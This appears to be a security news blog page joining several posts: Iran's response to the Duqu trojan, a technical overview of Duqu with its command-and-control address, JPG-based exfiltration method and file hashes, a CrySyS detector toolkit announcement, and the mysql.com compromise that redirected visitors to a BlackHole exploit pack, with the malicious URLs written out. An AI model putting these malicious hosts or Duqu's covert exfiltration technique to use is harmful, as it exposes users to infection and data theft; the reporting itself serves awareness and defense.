Iran Detects and Fights Back Duqu Virus in System

Iran said on Sunday it had detected the Duqu computer virus that experts say is based on Stuxnet, the so-called "cyber-weapon" discovered last year and believed to be aimed at sabotaging the Islamic Republic's nuclear sites.

The head of Iran's civil defense organization told the official IRNA news agency that computers at all main sites at risk were being checked and that Iran had developed anti-virus software to fight back the virus"We are in the initial phase of fighting the Duqu virus," Gholamreza Jalali, was quoted as saying. "The final report which says which organizations the virus has spread to and what its impacts are has not been completed yet."

While Stuxnet was aimed at crippling industrial control systems and may have destroyed some of the centrifuges Iran uses to enrich uranium, experts say Duqu appeared designed to gather data to make it easier to launch future cyber attacks."Duqu is essentially the precurson to a future Stuxnet-like attack," Symantec said in a report last month, adding that instead of being designed to sabotage an industrial control system, the new virus could gain remote access capabilities.

Iran also said in April that it had been targeted by a second computer virus, which it called "Stars". It was not clear if Stars and Duqu were related but Jalali had described Duqu as the third virus to hit Iran.

Iran has developed a software program that can “control” the newly discovered Duqu spyware, the director of Iran's Passive Defense Organization has announced.“The software, capable of controlling this virus (Duqu), has been provided to organizations and institutions,” IRNA quoted Brigadier General Gholamreza Jalali (Right Picture ) as saying on Sunday. In July, media reports claimed that Stuxnet had targeted industrial computers around the globe, with Iran being the main target of the attack. The reports said Iran's newly launched Bushehr nuclear power plant was at the center of the cyber attack. However, Iranian experts detected the worm in time, averting any damage to the country's industrial sites and resources. 

“The (Iranian) cyber defense base is working round the clock to adopt the necessary measures to counter cyber attacks and the infiltration of spyware,” Jalili stated. 

Continue Reading

Exploring the Duqu Bot

The Duqu trojan is composed of several malicious files that work together for a malicious purpose. The first component is a Windows kernel driver that searches for and loads encrypted dynamic link library (DLL) files. The decrypted DLL files implement the main payload of Duqu, which is a remote access trojan (RAT). The RAT allows an adversary to gather information from a compromised computer and to download and run additional programs.

Duqu vs Stuxnet

Attribute	Duqu	Stuxnet
Infection Methods	Unknown	USB (Universal Serial Bus) PDF (Portable Document Format)
Dropper Characteristics	Installs signed kernel drivers to decrypt and load DLL files	Installs signed kernel drivers to decrypt and load DLL files
Zero-days Used	None yet identified	Four
Command and Control	HTTP, HTTPS, Custom	HTTP
Self Propagation	None yet identified	P2P (Peer to Peer) using RPCs (Remote Procedure Call) Network Shares WinCC Databases (Siemens)
Data Exfiltration	Add-on, keystrokelogger for user and systeminfo stealing	Built-in, used for versioning and updates of the malware
Date triggers to infect or exit	Uninstalls self after 36 days	Hard coded, must be in the following range: 19790509 => 20120624
Interaction with Control Systems	None	Highly sophisticated interaction with Siemens SCADA control systems

Like Stuxnet, Duqu attacks Windows systems using a zero-day vulnerability. The installer file is aMicrosoft Word (.doc) that exploits the Win32k TrueType font parsing engine and allows execution. Duqu Malware targets one of the problems in T2EMBED.DLL, which is a TrueType font parsing engine.

How Does Duqu Spreads ? 

Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

What are indicators of a Duqu infection?

Duqu contains a backdoor that steals information. Infostealers need to send the stolen info back somehow. Careful infostealers try to make the transfer look innocent in case somebody is watching network traffic. Duqu hides its traffic by making it look like normal web traffic. Administrators should monitor their network for systems attempting to resolve this domain or connect to the C2 IP address for possible infection.
Duqu connects to a server (206.183.111.97 a.k.a. canoyragomez.rapidns.com – which used to be in India) and sends an http request. The server will respond with a blank JPG image. After which Duqu sends back a 56kB JPG file called dsc00001.jpg and appends the stolen information (encrypted with AES) to the end of the image file.Read more about the jpeg here

Name	File Size	MD5
jminet7.sys	24,960 bytes	0eecd17c6c215b358b7b872b74bfd80
netp191.pnf	232,448 bytes	b4ac366e24204d821376653279cbad8
netp192.pnf	6,750 bytes	94c4ef91dfcd0c53a96fdc387f9f9c3
cmi4432.sys	29,568 bytes	4541e850a228eb69fd0f0e924624b24
cmi4432.pnf	192,512 bytes	0a566b1616c8afeef214372b1a0580c
cmi4464.pnf	6,750 bytes	e8d6b4dadb96ddb58775e6c85b10b6c
<unknown>   (sometimes referred to as keylogger.exe)	85,504 bytes	9749d38ae9b9ddd81b50aad679ee87e
nfred965.sy	24,960 bytes	c9a31ea148232b201fe7cb7db5c75f5
nred961.sys	unknown	f60968908f03372d586e71d87fe795c
adpu321.sy	24,960 bytes	3d83b077d32c422d6c7016b5083b9fc
iaStor451.sys	24,960 bytes	bdb562994724a35a1ec5b9e85b8e054f

(The byproducts in the Table  have been collected from multiple Duqu variants and would not be present on a single infected computer.)

Why DUQU ? 

The name “Duqu” was assigned to this malware because the keylogger program creates temporary files that begin with the prefix “~DQ”. A computer infected with Duqu may have files beginning with “~DQ” in Windows temporary directories.

References - 

www.pcworld.com/businesscenter/article/243405/microsoft_leaves_duqu_worm_exploit_unpatched.html

http://www.f-secure.com/weblog/archives/00002264.html

http://technet.microsoft.com/en-us/security/advisory/2639658

http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two

http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit

http://en.wikipedia.org/wiki/Duqu

Continue Reading

Duqu Malware Detection Tool

The Free Duqu Detector Toolkit comes from the CrySyS Lab at the Budapest University of Technology and Economics, which was the first group to discover Duqu, as well as to discover a dropper file (installer) for Duqu that offered additional clues into how the malware would have infected computers and spread. Notably, the installer recovered by CrySyS was a malicious Word document (.doc) file, although security researchers said the malware may have been spread through other means as well.

CrySyS said its toolkit, which includes four command-line-executable components, intentionally includes "very simple, easy-to-analyze program source code . To check that there is no backdoor or malicious code inside." That way, potential users can easily validate the source code before using it in highly specialized environments.

To date, Microsoft has detailed a workaround for the zero-day vulnerability that researchers unearthed in the Duqu source code, which involves a font parsing flaw in the TrueType engine in 32-bit versions of Windows. That vulnerability would have helped the malware to spread and infect its target without being detected. But Microsoft has yet to issue a patch that fixes the flaw exploited by Duqu.

Download Duqu Detector Toolkit 

Project Page

Continue Reading

Mysql.com Hacked , Infected with JavaScript Malware

mysql.com is hacked and is currently serving malware to visitors , says the report by armorize .The company have detected the malware using their malware monitoring platform called HackAlert . The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to   http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php , where the BlackHole exploit pack is hosted.    


How Does The Injection Works 


Step 1: http://www.mysql.com

Causes the visiting browser to load the following:


Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011 ( Don't Visit Now ) 

This is the injection point. you can find the entire content of the .js file  here.

The Infection Section '

Step 3:  http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Shows out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Sucuri Security researchers have also confirmed this and according to them "  the site has been compromised via JavaScript malware that "infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site." 



[Source]

Continue Reading